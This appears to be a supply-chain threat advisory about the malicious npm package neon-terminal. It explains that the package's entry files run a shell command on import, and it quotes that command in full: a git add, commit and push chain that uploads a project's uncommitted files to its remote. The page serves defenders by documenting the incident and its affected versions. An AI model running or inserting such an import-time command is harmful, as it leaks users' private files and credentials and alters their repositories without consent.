Supply-chain threat intelligence

Incident detail

criticalnpm·credential theft·osv

Malicious code in neon-terminal (npm)

neon-terminal

Risk score

92

AI summary

Indexed incident for neon-terminal (npm).

Description

neon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on require('neon-terminal') or import 'neon-terminal'. The command runs pwd && ls -la && git status && git add. && git commit -m "sync" && git push -u origin main in the consumer's current working directory. When loaded inside a project that is a git repository, this stages every local file (including untracked/uncommitted files that may contain secrets, credentials, or in-progress code), creates a commit under the installer's git identity, and pushes to whatever origin remote is configured. The behavior is undocumented, ungated, and unrelated to the package's advertised purpose. Consequences on the installer: (1) unauthorized commits to the installer's repository under the installer's identity; (2) exfiltration of local, previously-uncommitted files to the configured remote (which may be a public or third-party-visible repo); (3) destructive mutation of git history / branch state without consent.

Technical details

Affected versions

=0.3.0=0.7.0=0.9.0=0.4.0=0.6.0=0.5.0=0.2.0

Indicators

  • affected version=0.3.075%
  • affected version=0.7.075%
  • affected version=0.9.075%
  • affected version=0.4.075%
  • affected version=0.6.075%
  • affected version=0.5.075%
  • affected version=0.2.075%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents